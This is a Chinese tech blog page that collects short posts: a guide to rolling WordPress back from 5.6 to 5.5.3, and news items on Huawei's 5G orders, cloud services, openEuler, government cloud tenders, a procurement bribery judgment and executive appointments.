今天主机吧发现WordPress 5.6版本更新了,在没有备份数据库和网站源码的情况下,直接点更新了。 结果出问题了,更新WordPress 5.6后,编辑器出问题了,无法添加标签了,这个很严重,要知道wordpress标签在搜索引擎中权重是非常高的。 所以主机吧就想到了退回WordPress 5.5.3版本,操作方法很简单,下载WordPress 5.5.3版本 下载地址https://zhujib.com/wordpress553zhcnzhongwenbanzui.html 下载后,把WordPress 5.5.3版本压缩包解析出来,然后删掉wp-content 文件夹 再打包,上传至网站根目录,解压覆盖。 最后访问 http://网址/wp-admin/ ,稍等会出现一个页面,提示需要更新数据库,点击更新,就可以恢复到旧版本的wordpress。 注意:网站根目录的 wp-content 文件夹里面有主题和插件等文件,所以千万不要覆盖掉,否则影响使用。   #### 华为4万多个5G基站已发往全球 占全球5G订单的近一半 4月11日 消息:据参考消息报消息,去年以来一直被美国恶意打压的华为,凭借其硬实力狠狠打了对方的脸。据数据显示, 2018 年,华为签订了 30 多个5G商用合同,占全球5G订单的近一半,并有 4 万多个5G基站已发往全球各地。 瑞士、泰国、马来西亚、菲律宾等多个国家无视美国的阻拦,纷纷选择与华为合作,测试5G。 就连与美国关系密切的“五眼联盟”也宣告瓦解,英国电信运营商们纷纷与华为签订5G订单。新西兰的态度也发生转变,对外表态称华为从未在该国5G竞争中“出局”。而被威胁的德国也放话称不需要美国“指手画脚”。 对此,网友表示欣慰,称这是反美国垄断的技术性突破,我们为此感到骄傲。正如任正非所言:“美国不可能摧毁华为,世界也无法离华为而去!”这不仅验证了华为的实力,更证明了祖国的强大。 #### 华为HMS上线独立搜索服务,绕开谷歌GMS限制 据硅谷分析狮消息,继Here WeGo地图上架后,华为自己的“HUAWEI Search”服务也上架了(之前一直是在内测),这可以看作是取代谷歌搜索的重要服务,集成在AppGallery应用商店中,除了简单的搜索外,其还有另外的功能,那就是帮助用户在没有Google Play商店的情况下查找应用。这个综合的搜索业务,将大大提高HMS服务支撑面,特别是补充应用上。 #### 华为IDC采购杜某、许某受贿159.45 万元被判刑 杜某、曾某某、许某某均于2019年7月15日被羁押,次日被刑事拘留,同年8月21日被逮捕。2020年6月被判刑,裁决文书近日对外公布。1 杜某于2011年8月入职华为公司,系数据中心领域合作团队主管,同时履行“数据中心领域合作经理”和“团队主管”的职责,包括对合作方的认证、选择、合同谈判签署;构建成本优势;供应商管理及行业管理;负责管理团队所有合作经理的工作,为该团队组织绩效目标负责;听取团队所有合作经理汇报,对团队成员绩效考核。曾某某曾为深坡市建筑工程股份有限公司的员工,后从该公司离职。2014年年中,曾某某通过他人认识杜某,并为杜某装修莲花北的房子。经杜某的推荐和帮助,曾某某通过挂靠深圳市建筑工程股份有限公司获取华为公司IDC工程项目,而华为公司明确不允许供应商通过挂靠的方式进行转包。在曾某某承接华为4个工程项目(项目总金额约3800万元)期间,2015年10月至2016年10月,曾某某为杜某垫资装修坂田万某诺丁山XXX房,后杜某给付了人民币20万元现金;2017年8月至2018年3月,曾某某为杜某垫资装修东莞市松山湖松湖花园XXX房,杜某于2018年7月10日向曾某某微信转账人民币5万元。经深圳市新永基土地房地产评估顾问有限公司对上述两套房产的装修价值进行评估,坂田万某诺丁山XXX房的装修价值为人民币18.17万元,东莞市松山湖松湖花园XXX房的装修价值为人民币50.28万元;即曾某某通过为杜某装修房子的方式向杜某行贿人民币43.45万元。2 许某某于2010年10月至2014年6月期间在华为公司担任高级合作经理职务,主要负责华为公司数据中心领域的合作和采购业务,接触的供应商主要有上海华东电脑股份有限公司(以下简称“华东电脑”)等。刘某(另案处理)于2005年入职华东电脑公司担任销售经理,负责该公司在华为公司的IDC销售业务。2011年5月,许某某将华东电脑引入成为华为公司IDC供应商,2011年至2012年期间,许某某与刘某合谋,故意提高华东电脑公司在华为公司IDC项目中的采购价,刘某分三次向许某某支付人民币116万元现金好处费。2012年2月至2013年4月期间,华为公司与华东电脑的购销合同金额累计人民币6000多万元。案发后华为公司对杜某、曾某某表示谅解。许某某向法院退赃人民币116万元。法院裁决: 广东省深圳市龙岗区人民法院认为:杜某利用职务上的便利,非法收受他人财物,为他人谋取利益,数额较大;许某某利用职务上的便利,非法收受他人财物,为他人谋取利益,数额巨大,二人的行为均已构成非国家工作人员受贿罪。曾某某为谋取不正当利益,给予公司工作人员以财物,数额较大,其行为已构成对非国家工作人员行贿罪。公诉机关指控的上述罪名成立。杜某、曾某某、许某某归案后能如实供述其罪行,认罪认罚,法院予以从轻处罚。许某某全额退赃,法院予以从轻处罚。杜某、曾某某取得华为技术有限公司谅解,法院在量刑时将予以考虑。公诉机关量刑建议合理,法院予以采纳。辩护人的合理辩护意见,法院予以采纳。杜某、曾某某归案后如实供述,认罪认罚,有悔罪表现,没有再犯罪的危险,法院依法适用缓刑。依照《中华人民共和国刑法》第一百六十三条第一款、第一百六十四条第一款、第七十二条第一、三款、第七十三条第二、三款、第六十七条第三款、第五十二条、第五十三条第一款、第五十九条、第六十四条之规定,判决如下:一、杜某犯非国家工作人员受贿罪,判处有期徒刑一年九个月,缓刑二年六个月。二、曾某某犯对非国家工作人员行贿罪,有期徒刑十个月,缓刑一年六个月,罚金人民币二万元。三、许某某犯非国家工作人员受贿罪,判处有期徒刑五年,并处没收财产人民币五万元。四、继续追缴杜某违法所得人民币43.45万元。 #### 华为openEuler操作系统正式开源!吹过的牛正在慢慢实现了~ 2019 年 9 月 20 日的HUAWEI CONNECT华为全链接大会上,华为透露其服务器操作系统EulerOS将会开源,命名为openEuler,以促进鲲鹏生态的发展。 当时,华为提出的目标是 2019 年 12 月 31 日上线openEuler开源社区,而在 2020 年 1 月 1 日,openEuler开源社区基础设施终于开张了,有中英文两种版本。 openEuler基础设施团队透露,他们管理着上千个代码仓库,而且要保证它们都能编译通过,这也是该社区面临的最大挑战,因为如此数量庞大的代码仓库会给整个基础设施系统带来很大的负载,工作量超乎想象。 据悉,openEuler主要包含两个组织仓库,一个用于源代码存放,当前有 20 多个仓库。 其中被重点推荐的有两个项目,一是iSulad,基于gRPC服务的云原生、轻量级容器运行时,相比runc它是用C语言编写的,但所有接口都兼容OCI;二是A-Tune,基于AI技术、可自动优化的基础系统软件。 另一个组织是src-openeuler,主要是用来存放软件包,它们构建起了openEuler操作系统的ISO镜像和安装包,当前存放了大约 1000 个软件包,每一个都提供ARM64、x86 架构版本,而且还会继续增加。 目前,社区有 50 多个贡献者,接近 600 次commit,网站上也定义了将近 20 个SIG(项目组)。 openEuler开源社区还现在处于筹备阶段,感兴趣的可联系infra@openeuler.org加入基础设施小组。 EulerOS是目前支持TaiShan服务器最好的操作系统之一,在性能、兼容性、功耗等方面具备较强的竞争力,持续推动鲲鹏处理器的生态构建。 提升多核并发能力,增强业务性能;L2 Cache共享技术,提升不同OSD进程间访问效率;首次在鲲鹏处理器架构内实现内核热补丁。通过和Linaro及绿色产业联盟合作,联合构建绿色计算生态联盟,促进鲲鹏生态发展。通过鲲鹏处理器的关键特性使能,实现了核心业务场景性能突破,并在Linux内核、虚拟化、GCC、OpenJDK及Docker等开源社区持续贡献,催熟产业生态。 #### 华为、阿里、腾讯、太极 5278 万元中标国家政务服务平台“互联网+监管”应用系统 3月21日国家政务服务平台“互联网+监管”应用系统建设项目中标结果发布: 中标供应商:太极计算机股份有限公司 中标金额:人民币 5278.66 万元 私有云部分中标厂商:华为,提供计算存储资源、数据中心、云管平台、网络传输、网络资源、安全运维服务等。 大数据中心由阿里云、华为、腾讯、太极共同提供技术支持,服务包括数据采集系统(阿里云)、数据开发与治理系统(阿里云DataWorks、华为FusionInsight、阿里云数据资源平台等)、大数据计算系统(阿里云大数据计算服务(Maxcompute)阿里云开放存储服务软件(OSS))、流计算系统(华为FusionInsight)、机器学习平台(阿里云机器学习PAI Quick BI 云数据库)、大数据可视化系统(阿里云Data V)、交互式BI系统(华为FusionInsight)、数据资源(腾讯)、数据库建设(太极、阿里云、腾讯)、数据采集调用系统(太极)、监管事项目录清单动态管理系统(太极)。 应用系统太极、阿里、腾讯、视联动力共同提供技术支持。 主要中标标的基本概况(因公众号篇幅限制,模块或部件数量、模块或部件单价、设备数量、折扣、运费及保险费、设备响应报价六个部分可点击“阅读原文”查看): 项 1 2 3 4 序号 设备名称 型号 模块或部件名称 模块或部件描述 (一) 私有云资源租用(本次私有云服务报价周期9个月,交付有效期18个月,交付截止期为项目终验) 1 计算存储资源 华为FusionCloud 虚拟机资源 VCPU(核):3768内存(G):10208磁盘(G):272400 华为FusionServer 2488H V5 服务器机型一 CPU类型:4路18核处理器;内存:256GB DDR4 RDIMM 内存;硬盘:3*800GB SSD;网络:2*GE+2*10GE;Raid卡:支持RAID 0/1/10/5/50/6/60 华为FusionServer 2288 V5 服务器机型二 配置两颗相等或优于Intel Xeon E5-2640V4_10C_2.4GHz;内存:配置64GB DDR4内存,24个DDR4内存插槽;硬盘:配置3块300GB 10K 热插拔SAS硬盘; 华为FusionServer 2488H V5 服务器机型三 CPU类型:配置四颗相等或优于Intel? Xeon? Gold 6130_16C_2.1GHz;内存:配置128GB DDR4内存,48条DDR4 内存插槽;硬盘:配置3块600GB 10K 热插拔SAS硬盘;网卡:配置4个万兆以太网口(光纤接口含多模模块); 华为FusionServer 2488H V5 服务器机型四 配置四颗相等或优于Intel? Xeon? Gold 6150_18C_2.7GHz;内存:配置256GB DDR4内存,48条DDR4 内存插槽;硬盘:配置3块900GB 10K 热插拔SAS硬盘; 华为FusionServer 2288 V5 服务器机型五 CPU类型:相等或优于Intel Xeon Gold 6132*2内存:192G ECC DDR4 RDIMM 硬盘:SATA/7200rpm HDD 6T*12 网络:1张双端口10G网卡,满配兼容多模模块(SFP+)磁盘控制器:sas卡*1 华为FusionServer 2288 V5 服务器机型六 CPU类型:相等或优于Intel Xeon Silver 4114*2内存:256G ECC DDR4 RDIMM 硬盘:SATA SSD240GB *2 NVMeSSD960GB*2 SATA HDD 6TB*9 网络:1张双端口10G网卡,满配兼容多模模块(SFP+)磁盘控制器:sas卡*1 华为FusionServer 2288 V5 服务器机型七 CPU类型:相等或优于Intel Xeon Silver 4114*2内存:384G ECC DDR4 RDIMM 频率=2666MHz;硬盘:SAS HDD 600G*12 网络:1张双端口10G网卡,满配兼容多模模块(SFP+)磁盘控制器:1块RAID卡,支持SAS、SATA、SSD硬盘;RAID卡支持raid0,1,5,6,10 华为FusionServer 2288 V5 服务器机型八 CPU类型:相等或优于Intel Xeon Silver 4114*2内存:384G ECC DDR4 RDIMM 硬盘:SATA SSD480G*3+SATA HDD4T*9网络:1GE*2,2块双端口10G网卡,满配兼容多模模块(SFP+)磁盘控制器:sas卡*1 华为FusionServer 2288 V5 服务器机型九 CPU类型:相等或优于Intel Xeon Silver 4114*2内存:192G ECC DDR4 RDIMM 硬盘:SAS HDD 600G*4网络:1张双端口10G网卡,满配兼容多模模块(SFP+)磁盘控制器:1块RAID卡,支持SAS、SATA、SSD硬盘;RAID卡支持raid0,1,5,6,10 华为FusionServer 2288 V5 服务器机型十 CPU类型:相等或优于Intel Xeon Silver 4114*2内存:384G ECC DDR4 RDIMM 硬盘:480Gsata ssd*3 4Tsata hdd*9 网络: 1块双端口10G网卡,满配兼容多模模块(SFP+) 磁盘控制器:sas卡*1 华为FusionServer 2288 V5 服务器机型十一 CPU类型:相等或优于Intel Xeon Platinum 8160 *2内存:192G ECC DDR4 RDIMM 硬盘:SATA SSD240GB *1+NVMe SSD 960G*1网络: 1块双端口10G网卡,满配兼容多模模块(SFP+)磁盘控制器: sas卡*1 华为FusionServer 2288 V5 服务器机型十二 CPU类型:相等或优于Intel Xeon Platinum 8160 *2内存:768G ECC DDR4 RDIMM 硬盘:SATA SSD240GB *1+NVMe SSD 3.84T*4网络:1GE*2 ,2块双端口10G网卡,满配兼容多模模块(SFP+) 磁盘控制器:sas卡*1 华为FusionServer 2288 V5 服务器机型十三 CPU类型:相等或优于Intel Xeon Silver 4114 *2内存:192G ECC DDR4 RDIMM 硬盘:SAS HDD 600G*4网络:1块双端口10G网卡,满配兼容多模模块(SFP+) 磁盘控制器:1块RAID卡,支持SAS、SATA、SSD硬盘;RAID卡支持raid0,1,5,6,10 华为FusionServer 2288 V5 服务器机型十四 CPU类型:相等或优于Intel Xeon Silver 4114 *2内存:128G ECC DDR4 RDIMM 硬盘:SATA SSD240GB *2+NVMe SSD 1.92T*2+SATA HDD8T*12网络: 1GE*2, 1块双端口10G网卡,满配兼容多模模块(SFP+)磁盘控制器: sas卡*1 华为FusionServer 2288 V5 服务器机型十五 CPU类型:相等或优于Intel Xeon Silver 4114 *2内存:192G ECC DDR4 RDIMM硬盘:600Gsas hdd*4网络:1GE*2,10GE*2,满配兼容多模模块(SFP+)磁盘控制器:1块RAID卡,支持SAS、SATA、SSD硬盘;RAID卡支持raid0,1,5,6,10 华为FusionServer 2488 V5 服务器机型十六 NTP时钟服务器:CPU类型:四核内存:4G硬盘:64G SSD网络:1GE*2,10GE*2(含有多模SFP光模块), 北斗授时: 支持单模、多模授时方式 华为FusionServer 2288 V5 服务器机型十七 CPU:相等或优于2*E5 2640V4;内存:256GB;硬盘:600GB*2 SAS 硬盘,1.2TB*24 SAS 硬盘;网络:两个千兆网口,两个万兆网口Raid:支持Raid0、1、5、6 华为FusionServer 2288 V5 服务器机型十八 CPU:相等或优于2*E5 2640V4;内存:256GB;硬盘:600GB*2 SAS 硬盘,1.2TB*12 SAS 硬盘;网络:两个千兆网口,两个万兆网口Raid:支持Raid0、1、5、6 华为FusionServer 2288 V5 服务器机型十九 CPU:相等或优于2*E5 2640V4;内存:256GB;硬盘:600GB*2 SAS 硬盘,600GB*12 SAS 硬盘;网络:两个千兆网口,两个万兆网口Raid:支持Raid0、1、5、6 华为Taishan 2280 服务器机型二十 CPU: 24/32核MEM:128G/256G内存;Disk:系统盘SAS Raid 10数据盘SATA盘 不做Raid系统盘SAS盘,15000RPM,2块*600GB,做Raid10,数据盘建议SATA盘,7200RPM,10*2TB,不做Raid网卡:万兆,双网卡 华为Taishan 2280 服务器机型二十一 CPU: 24/32核;MEM:128G内存;Disk:系统盘SAS Raid 10数据盘SATA,不做Raid系统盘SAS盘,15000RPM,2块*600GB,做Raid10,数据盘建议SATA盘,7200RPM,10*2TB,不做Raid网卡:万兆,双网卡 华为Taishan 2280 服务器机型二十二 CPU   2Gx8 Memory 8G 硬盘2T 华为Taishan 2280 服务器机型二十三 CPU   2Gx8 Memory 16G 硬盘 6T 华为Taishan 2280 服务器机型二十四 CPU   2Gx8 Memory 8G 硬盘2T 华为FusionServer 2288 V5 服务器机型二十五 内存: 64G (4*16G)CPU:2*12核 显卡: TESLA P10 GPU 华为Fusionstorage 分布式块存储 102TB(5年) 华为Fusionstorage 分布式文件共享存储 566TB(5年) 华为Fusionstorage 大数据中心分布式文件共享存储 1643TB(5年) 2 云平台机房 华为云平台机房 云平台机房 国家“互联网+监管”系统大数据平台采用华为专属云,所在数据中心设置移动、电信、联通三大运营商机房,满足客户多维度进线需求。技术支持和运维保障可以快速响应,可以与互联网、国家电子政务外网便捷的互联互通。 3 云管平台 华为FusionCloud 云管平台 云管理平台可以实现跨数据中心、跨OpenStack资源池分配虚拟数据中心资源的功能,便于用户统一管理,降低运维复杂程度 4 网络传输 华为FusionCloud 网络传输 云平台内部网络带宽不小于1000Mbps。生产网络与电子政务外网带宽不小于10000Mbps。数据中心之间管理链路通过网闸进行互联,网络带宽不小于10000Mbps。 6 网络资源 华为FusionCloud  网络资源 网络系统由核心交换机、接入交换机和带外管理交换机及安全网关(防火墙)、集群网闸等跨网数据交换设备组成。 7 安全运维服务 华为FusionCloud 安全运维服务 提供DDoS流量清洗服务、WEB应用防火墙服务、网站监测服务、云主机入侵防护服务、云防火墙服务、云堡垒机服务、数据库审计服务、云安全态势感知服务、跨网安全隔离交换服务等服务 (二) 大数据中心 1 大数据处理分析平台 1.1 数据采集系统 阿里数据迁移;云服务器(ECS);阿里云服务器负载均衡管理软件(SLB) DTS不停服迁移;DTS数据订阅;DTS数据同步 DTS不停服迁移;DTS数据订阅;DTS数据同步 1.2 数据开发与治理系统 阿里云DataWorks-数据研发   阿里云DataHub数据总线 数据开发 提供可视化DAG数据开发服务,支持:SQL、MR、SHELL等开发。 阿里云DataWorks-数据研发;阿里云专有网络软件(VPC) 监控运维 提供工作流任务运维能力,支持监控报警。 华为FusionInsight 资产门户 对平台的数据资产进行统一管控和查看 华为FusionInsight 数据地图 展示面向开发者和管理者的数据资产情况 阿里云DataWorks-数据治理 资产管理 企业数据资产管理、成本控制。 阿里云DataWorks-数据治理 阿里云流计算(Stream compute) 数据质量 数据质量监控,提供丰富规则和自动化触发。 阿里云DataWorks-数据治理 数据安全 提供数据打标、数据审计、数据脱敏服务。 华为FusionInsight 数据服务 API管理注册;API授权鉴权管理;API使用管控 阿里云数据资源平台 智能标签 标签中心、分析引擎,实体关系数量<5000,标签数量<100000; 华为FusionInsight 数据治理 数据探查;标准管理;模型管理;数据处理节点;数据处理流程编排等 阿里云数据资源平台;云盾-安骑士高级版 平台管理 数据资源平台管理 1.3 大数据计算系统 阿里云大数据计算服务(Maxcompute)阿里云开放存储服务软件(OSS) 阿里云大数据计算服务(Maxcompute) MaxCompute是一项大数据计算服务,它能提供快速、完全托管的PB级数据仓库解决方案,使用户可以经济并高效的分析处理海量数据。 1.4 流计算系统 华为FusionInsight 流计算系统 单集群通过项目空间支持多租户,支持CPU核数、内存空间完全隔离;支持创建项目空间,项目空间之间命名空间隔离、资源隔离;支持删除项目空间;支持项目扩建的扩缩容,支持项目空间扩缩容正常操作下不影响作业运行;支持流计算作业的状态控制,支持流计算作业启动、暂停、恢复、停止 1.5 机器学习平台 阿里云机器学习PAI Quick BI 云数据库 PAI算法模块 阿里云机器学习和深度学习平台PAI(Platform of Artificial Intelligence),为传统机器学习提供上百种算法和大规模分布式计算的服务,支持最新的深度学习开源框架。 1.6 大数据可视化系统 阿里云Data V Data V数据可视化工具 通过图形化的界面轻松搭建专业水准的可视化应用,满足会议展览、业务监控、风险预警、地理信息分析等多种业务的展示需求。 1.7 交互式BI系统 华为FusionInsight  交互式BI系统  交互式BI系统 2 数据资源 腾讯数据资源 数据资源 互联网的主流网站、论坛、社交媒体的舆情数据进行定期收录并分析 3 数据库建设 太极数据库 监管事项目录清单库 监管事项目录清单库 阿里云数据库 监管对象基础信息库 监管对象基础信息库 阿里云数据库 监管行为信息库 监管行为信息库 腾讯数据库 监管事项投诉举报信息库 监管事项投诉举报信息库 阿里云数据库 失信企业(人员)信息库 失信企业(人员)信息库 阿里云数据库 互联网重要舆情及第三方信息库 互联网重要舆情及第三方信息库 阿里云数据库 知识库 知识库 4 数据采集调用系统 太极数据采集调用系统 数据采集调用系统 提供批量交换、动态采集和服务接口等多种方式,将国务院各部门“互联网+监管”系统、各地区“互联网+监管”系统、投诉举报、互联网及第三方机构和一体化政务服务平台等相关信息,交换汇聚至国家“互联网+监管”系统大数据中心;遥感软件采购 5 监管事项目录清单动态管理系统 太极监管事项目录清单动态管理系统 监管事项目录清单动态管理系统 提供监管事项汇聚、统计功能,规范监管事项的发布、运行,实现监管事项的动态化、标准化管理。各省“互联网+监管”系统监管事项目录清单数据也纳入国家监管事项目录清单动态管理系统同步更新。通过编码规则管理子系统、目录清单管理子系统、事项汇聚审核子系统、分类反馈子系统、统计分析子系统、分类查询子系统实现各类监管事项的动态管理。 (三)应用系统 1 执法监督系统 1.1 协同监管系统 太极协同监管系统 协同监管系统 监管任务支持系统通过协同任务管理子系统、数据资源共享子系统、留痕管理子系统实现相应功能。部门联合“双随机”模块,为部门联合“双随机、一公开”监管业务提供支持,即提供双随机抽查结果部门间共享交换与互认互用的功能,实现“进一次门,查多项事” 1.2 监管效能评估评价 阿里监管效能评估评价 监管效能评估评价 评估评价指标体系建设和监管效能评估评价系统建设两项任务。通过监管指标管理子系统、数据获取与计算子系统、监管效能评级子系统、结果反馈子系统、可视化展示子系统实现相应功能。 1.3 监管投诉举报系统 腾讯监管投诉举报系统 监管投诉举报系统 投诉举报受理处理通过登记受理子系统、分类分发子系统、督办督查子系统、反馈评价子系统、数据对接子系统实现相应功能;投诉举报信息的统计分析通过统计分析子系统 1.4 通用执法检查模块 太极通用执法检查模块 通用执法检查模块 提供通用执法检查流程功能模块 2 风险预警系统 2.1 风险预警系统 腾讯风险预警系统 市场监管领域 具备市场监管领域不少于5项风险模型。 腾讯风险预警系统 海关领域 具备海关领域不少于3项风险模型。 腾讯风险预警系统 税务领域 具备税务领域不少于3项风险模型。 腾讯风险预警系统 金融领域 具备金融领域不少于3项风险模型。 腾讯风险预警系统 卫生健康领域 具备卫生健康领域不少于3项风险模型。 阿里风险预警系统 生态环境领域 具备生态环境领域不少于3项风险模型。 阿里风险预警系统 自然资源领域 具备自然资源领域不少于3项风险模型。 阿里风险预警系统 应急管理领域 具备应急管理领域不少于3项风险模型。 阿里风险预警系统 文化旅游领域 具备文化旅游领域不少于3项风险模型。 阿里风险预警系统 交通运输领域 具备交通运输领域不少于3项风险模型。 阿里风险预警系统 农业领域 具备农业领域不少于3项风险模型。 2.2 风险预警工具 腾讯TBDS大数据基础平台 风险预警工具 风险预警提供两级数据融合分析引擎。支持不同数据来源、不同维度数据的分析需求。 2.3 信用模型系统 阿里芝麻信用企业信用评级;企业信用监管系统  信用模型系统 基于共创实验室模式的大数据平台,提供企业征信标准解决方案及方案中的细颗粒度产品 3 决策支持系统 3.1 可视化展示子系统 阿里决策支持系统-蚂蚁摩斯安全计算平台、监管驾驶舱 可视化展示子系统 结合采购单位提供的大屏,实现与各级监管部门的视频通信、视频监控前端图像的整合展示、政务部门为民办事各服务窗口可视化管理、实施指挥调度、数据可视化展示等功能。基于国家“互联网+监管”系统大数据中心所归集的各部门、地区多种监管数据,对其进行深度整合和分析,采用图、表等多种方式,通过大屏幕、PC、移动设备等可视化展现监管部门、监管对象、监管执法、事件跟踪、风险预警等各方面情况,多维度呈现监管工作全局态势 3.2 重点事件跟踪反馈子系统 腾讯重点事件跟踪反馈子系统 重点事件跟踪反馈子系统 通过对重点事件进行跟踪、调用重点事件数据、分析重点事件数据、反馈重点数据,实现重点事件的跟踪反馈业务功能。对重点事件的各主要环节信息进行实时记载,并自动更新最近动态,全链条记录事件发生的根源、事件动态、事件影响、舆情反映等数据,通过多视角、多维度进行对比、分析、研判,结合多方因素针对某一重点事件及时反馈给相关部门。 3.3 综合分析子系统 腾讯综合分析子系统 综合分析子系统 聚合各类监管数据信息,依托智能化适用性数据分析模型和工具从不同监管行业、监管区域、监管领域等多个维度对监管数据和监管结果进行分类,并按各类监管主题特性、监管对象类型、监管对象信用等要素进行多种专题和关联统计分析,形成地区、行业、部门等多维度的监管工作统计分析报表,生成相关综合分析评估报告。 4 界面建设 4.1 Web界面建设 腾讯Web界面 Web界面建设 Web界面建设 4.2 APP界面建设 阿里移动应用开发平台 APP界面建设 APP界面建设 4.3 建设微信小程序 腾讯微信小程序 建设微信小程序 建设微信小程序 4.4 建设支付宝小程序 阿里支付宝小程序 建设支付宝小程序 建设支付宝小程序 5 视频监控融合指挥平台 5.1 核心服务平台系统 视联动力VERA-GDM 核心服务平台系统 核心服务平台系统由视联网/统一视频服务平台系统(视联网/统一视频核心服务系统)嵌入在视联网核心服务器组成,具备会议电视系统多点控制单元的模块 5.2 视频融合调度系统 视联动力Tkula-A-Z-MS6000 视频融合调度系统 视频融合调度系统为视联网/统一视频监控融合调度平台服务系统嵌入在服务器中 5.3 视频监控资源接入系统 视联动力MS-GDM-XIVS50V(WG-XZ12) 视频监控资源接入系统 视频监控资源接入系统为视联网/统一视频视频监控接入服务系统嵌入在监控接入服务器, 5.4 地理信息调度系统 视联动力VERA-A-Z-PHVX(WG-LT10) 地理信息调度系统 地理信息调度系统是视联网GISM地理信息模块服务系统嵌入在服务器上。 5.5 移动接入系统 视联动力VERA-A-Z-GISM 移动接入系统 移动接入系统是视联网/统一视频移动接入服务系统嵌入在移动接入服务器上,作为移动接入服务器向移动客户端提供统一的接入能力 5.6 视频监控资源共享系统 视联动力VERA-A-Z-MBL 视频监控资源共享系统   视频监控资源共享系统是视联网/统一视频监控资源分享服务系统嵌入在应用服务器上 5.7 网络设备 RG-S7805C 主机、引擎主板、业务板、电源 RG-S7805C网络交换机,配置含主机*1、引擎主板*2、业务板≥1、电源*2,满足平台组网互联应用需要。支持48端口千兆以太网电口(RJ45)+4端口万兆以太网光口(SFP+,LC),电源模块(型号:RG-PA300I-F,交流:180~264V, 功率:300W)。 #### 华为云DNS一家非常良心的免费域名DNS服务 DNS大家都知道,是域名解析的基础,好的DNS不仅可以让网站访问稳定,还可以提升网站访问速度,甚至可以防御攻击。之前主机吧一直都是用阿里云的免费DNS,主要是大品牌值得信赖,偶然的一次机会,主机吧接触到了华为云DNS,瞬间喜欢上了这个DNS服务,不仅免费,而且功能强大,很多在别家服务商收费的功能,华为云DNS都是免费提供的。 比如线路区分,可以区分运营商线路解析,如国内电信、联通、移动、铁通、教育网、长城等线路都是可以区分,还可以区地域解析,如国内、国外,北美、欧洲、非洲等,还可以自定义线路,这个功能用法非常有内涵,可以把固定的某个IP段设置成只访问这个IP,某些特殊情况下非常有用的功能,简直不要太强大了! 还可以自义TTL值,要知道阿里云的最低才10分钟,而华为云DNS居然可以设置1秒?! 什么概念?我马上改,客户端马上生效!牛批! 连NS生效时间也可以改,要知道阿里云的NS生效时间可是没得改的,一般生效都是24小时至48小时,而华为的居然还是可以自义!吊! 提供的解析类型也相当丰富!支持AAAA IPV6地址解析,还支持SRV,甚至CAA,总之阿里有的华为云都有,阿里云没有的,华为云也有! 有需要用的同学可以去看看,地址https://www.huaweicloud.com/product/dns.html 注册一个帐号,点免费使用,点公网解析 创建添加公网域名即可   #### 华为云、腾讯云、阿里云中标「央视2018年租赁公有云服务」项目 8月29日央视国际网络有限公司发布《2018年租赁公有云服务项目》公开招标公告。招标内容为:2018年租赁公有云入围服务,服务期限自中标之日起一年。 中化国际招标有限责任公司受央视国际网络有限公司的委托,就“2018年租赁公有云服务项目”项目(项目编号:0747-1861SITCN452)组织采购,评标工作已经结束,中标结果如下: 一、项目信息 项目编号:0747-1861SITCN452 项目名称:2018年租赁公有云服务项目 项目联系人:魏霖荫、白云鹏 联系方式:010-59369345、59369337   二、采购单位信息 采购单位名称:央视国际网络有限公司 采购单位地址:北京市海淀区西三环中路10号望海楼E座 采购单位联系方式:010-88427387   三、项目用途、简要技术要求及合同履行日期: 2018年租赁公有云入围服务 本项目建设时间从中标通知书发出之日起,要求在中标之后10天内完成项目的交付。服务期限自中标之日起一年。   四、采购代理机构信息 采购代理机构全称:中化国际招标有限责任公司 采购代理机构地址:北京复兴门外大街A2号中化大厦 采购代理机构联系方式:魏霖荫、白云鹏,010-59369345、59369337   五、中标信息 招标公告日期:2018年08月29日 中标日期:2018年10月15日 总中标金额:0.0 万元(人民币) 中标供应商名称、联系地址及中标金额: 序号 入围供应商名称 入围供应商地址 1 华为软件技术有限公司 南京市雨花台区软件大道101号 2 腾讯云计算(北京)有限责任公司 北京市海淀区知春路49号3层西部309 3 阿里云计算有限公司 浙江省杭州市西湖区转塘科技经济区块16号8幢 本项目招标代理费总金额:45000.0 万元(人民币) 本项目招标代理费收费标准: 招标代理机构将在向入围供应商发出入围通知书的同时,向入围供应商收取固定金额15000元招标代理服务费。   评审专家名单: 从培民、刘梅、张稳、张荣久、廖智伟   中标标的名称、规格型号、数量、单价、服务要求: 详见公告原文   六、其它补充事宜 此项目为入围项目,合同金额以实际签订为准。 #### 华为云全球最大,贵安数据中心正式商用:可达100万台服务器规模 12 月 21 日消息,据贵阳日报报道,12 月 20 日,华为云计算技术有限公司贵安园区开园暨华为全球培训中心开业典礼在国家级新区贵安新区举行。这标志着华为云贵安数据中心历时 5 年建设正式商用。这也是华为云最大的云数据中心,未来将达到 100 万台服务器规模。 据介绍,贵安云数据中心目前已承载华为云大数据、云渲染、云手机、容灾等业务,辐射重庆、广西、广东、云南、四川等地。 华为云贵安数据中心将绿色和智能技术融入整体设计中,具备绿色低碳、智能可靠的特点,能效比 PUE 仅 1.12,处于业界领先水平,满负荷运行的情况下,年可减少碳排放 81 万吨,相当于植树 3567 万棵。 华为云数据中心落户贵安,华为云业务全球总部建在贵安,有力支持贵州“在实施数字经济战略上抢新机”。同时,华为将进一步促进贵州 IT 人才培养,促进本地高质量人才的培育孵化,以技术赋能企业,以产教融合培养数字经济技术型、实用型人才。 园区建有 98 间培训教室,可同时容纳 3000 多人,将承担华为全球 IT、云及数字化转型客户培训职能,支持全球云及 IT 培训与认证、数字化转型培训、军团新场景等集中与远程培训交付与运营,还将为全球华为客户提供产品技术培训、管理培训、培训认证服务、行业人才培养、行业数字化转型、军团新场景培训与认证、人才发展咨询等服务 #### 华为云或独立运营:徐直军任董事长、余承东任 CEO 2021年4月9日,华为官宣徐直军被任命为华为云董事长(兼)、余承东任CEO,张平安任 Cloud BU 行政管理团队 主任。 2021年1月27日,余承东被任命为华为云与计算BG总裁、Cloud BU总裁。2021年4月2日,华为任命张平安为 Cloud BU 总裁,同时宣布撤销云与计算BG(英文名 Cloud&AI BG),原服务器、存储等划归至「网络产品与解决方案」,同时将该部门名称改为ICT产品解决方案。以下为云头条修改版的华为组织架构图: 华为原组织结构图(截止2021年4月2日): IDC 咨询数据显示:2020年Q3华为云市场份额同比猛增5.1%至9.1%;收入骤增477.5%至22.3亿元;2018年华为云位居市场第六位,份额为4%,如今已跃居第三位。华为云2020年前三个季度(公有云IaaS+PaaS)收入57.3亿元。 据知情人士称此次任命与消费者BG、数字能源业务板块如出一辙,或为华为云独立运营做铺垫,可见未来华为云将成为华为的新增核心部门。 #### 华为云服务器宕机 或是有吏以为最大的一次故障 4月10日 消息:今日,针对“服务器宕机”一事,华为云回应称,目前故障基本修复,部分客户的业务正在配合恢复中。 